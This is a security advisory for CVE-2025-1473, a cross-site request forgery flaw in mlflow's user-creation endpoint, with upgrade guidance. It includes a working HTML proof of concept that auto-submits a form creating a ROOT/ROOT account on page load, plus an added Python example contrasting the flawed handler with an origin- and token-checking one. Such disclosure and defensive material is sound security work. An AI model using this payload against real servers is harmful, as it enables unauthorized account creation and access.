Cross-site Request Forgery (CSRF) Affecting mlflow package, versions [,2.20.2)


Severity

medium (CVSS assessment made by Snyk's Security Team)

Threat Intelligence

Exploit Maturity
Proof of Concept

  • Snyk ID: SNYK-PYTHON-MLFLOW-9486736
  • Published: 21 Mar 2025
  • Disclosed: 20 Mar 2025
  • Credit: krishnast545

Introduced: 20 Mar 2025

CVE-2025-1473
CWE-352

How to fix?

Upgrade mlflow to version 2.20.2 or higher.

Overview

mlflow is a platform to streamline machine learning development, including tracking experiments, packaging code into reproducible runs, and sharing and deploying models.

Affected versions of this package are vulnerable to Cross-site Request Forgery (CSRF) through the Signup feature: the user-creation endpoint (/api/2.0/mlflow/users/create) accepts a plain form-encoded POST with no CSRF token and no origin check, so a malicious page can make the browser of any user who visits it submit that request. An attacker can thereby create a new account with credentials of their choosing, which may then be used to perform unauthorized actions on the tracking server.

PoC

<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <title>CSRF Attack</title>
</head>
<!-- auto-submits a cross-origin form POST to the user-creation endpoint as soon as the page loads -->
<body onload="document.forms['csrfForm'].submit();">
  <form id="csrfForm" action="http://127.0.0.1:5000/api/2.0/mlflow/users/create" method="POST">
    <input type="hidden" name="username" value="ROOT">
    <input type="hidden" name="password" value="ROOT">
  </form>
</body>
</html>
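As an added example (not mlflow's own code and not part of this advisory), the Python below models why the form POST in the PoC is accepted and what a hardened user-creation handler must verify before honouring it: that the request's Origin (or, failing that, Referer) is the server's own origin, and that the form carries a per-session synchronizer token a cross-site page cannot read. Requests are represented as plain header/form dicts, the server origin http://127.0.0.1:5000 is taken from the PoC's action URL, and the attacker origin, the alice/s3cret credentials and the session token are all constructed for the example.

```python
"""Added example, not mlflow's code: a minimal model of why the form POST in
the PoC succeeds and what a CSRF-safe user-creation handler must check.
Requests are plain dicts standing in for a real HTTP request (assumption)."""
import hmac
import secrets
from urllib.parse import urlsplit

# Origin of the tracking server, taken from the PoC's action URL (assumption).
ALLOWED_ORIGIN = "http://127.0.0.1:5000"
# Per-session anti-CSRF token; a real app would bind this to the login session.
SESSION_TOKEN = secrets.token_urlsafe(32)

# Constructed request: what the PoC page makes the visiting browser send.
POC_HEADERS = {
    "Origin": "http://attacker.example",  # constructed attacker origin
    "Content-Type": "application/x-www-form-urlencoded",
}
POC_FORM = {"username": "ROOT", "password": "ROOT"}


def _header(headers, name):
    """Case-insensitive header lookup."""
    for key, value in headers.items():
        if key.lower() == name.lower():
            return value
    return None


def request_is_same_origin(headers, allowed_origin=ALLOWED_ORIGIN):
    """Origin check: trust the Origin header, fall back to Referer, and fail
    closed when neither is present (a state-changing request needs provenance)."""
    origin = _header(headers, "Origin")
    if origin is None:
        referer = _header(headers, "Referer")
        if referer is None:
            return False
        parts = urlsplit(referer)
        origin = f"{parts.scheme}://{parts.netloc}"
    return origin == allowed_origin


def token_matches(form, session_token):
    """Synchronizer token check in constant time; a cross-site form cannot
    read the victim's token, so it cannot supply a matching value."""
    submitted = form.get("csrf_token", "")
    return hmac.compare_digest(submitted.encode(), session_token.encode())


def create_user_unchecked(form, users):
    """The flawed behaviour: any well-formed form POST creates an account."""
    username, password = form.get("username"), form.get("password")
    if not username or not password:
        return 400
    users[username] = password
    return 200


def create_user_hardened(headers, form, users, session_token=SESSION_TOKEN):
    """Same endpoint with both checks in front of it."""
    if not request_is_same_origin(headers) or not token_matches(form, session_token):
        return 403
    return create_user_unchecked(form, users)


def legit_request(token=SESSION_TOKEN):
    """Constructed same-origin request as the real signup page would send."""
    headers = {"Origin": ALLOWED_ORIGIN, "Content-Type": "application/x-www-form-urlencoded"}
    form = {"username": "alice", "password": "s3cret", "csrf_token": token}
    return headers, form


if __name__ == "__main__":
    store = {}
    print("unchecked, PoC request:", create_user_unchecked(POC_FORM, store), store)
    store = {}
    print("hardened, PoC request:", create_user_hardened(POC_HEADERS, POC_FORM, store), store)
    hdrs, frm = legit_request()
    print("hardened, same-origin with token:", create_user_hardened(hdrs, frm, store), store)
```

The origin check alone stops the PoC as written (the browser sets Origin on cross-site form POSTs and the page cannot override it), but the token is still worth keeping: it covers clients that strip Referer and send no Origin, and it fails closed rather than open when neither header arrives. Either check would have rejected the PoC's ROOT/ROOT request.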
